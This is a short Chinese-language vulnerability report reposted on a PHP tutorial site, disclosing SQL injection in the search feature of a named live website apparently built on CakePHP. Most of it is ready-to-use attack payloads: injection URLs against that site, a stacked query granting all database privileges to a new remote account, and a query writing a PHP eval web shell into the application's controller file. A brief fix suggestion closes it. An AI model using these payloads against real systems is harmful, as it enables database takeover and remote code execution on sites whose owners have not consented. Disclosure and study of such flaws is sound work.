来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251cakephp多数框架版本架设的应用不带搜索的注入过滤这里的1=1可以任意换。然后你可以%#39;) and 1=1;grant all privileg......
http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251
cakephp多数框架版本架设的应用不带搜索的注入过滤 这里的1=1可以任意换。 然后你可以 %') and 1=1;grant all privileges on *.* to 'zimengqian'@'%' identified by '12345678';# 你可以 %') and 1=(select '<?php eval($_POST[c])?>' into outfile '/data/web_root/abram.intra.vcotton.com/www/current/app/app_controller.php');#(悲催的是无写权限) 漏洞证明:http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251 http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D2+and+1+like%28%27%251 修复方案:www.2cto.com 自己在适当位置addslashes 并且 用str_replace给%和_加斜杠 或者修改 core/libs/controller/components/request_handler.php 以适应全部(也许2.0已经修改了这个bug) 作者 紫梦芊 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com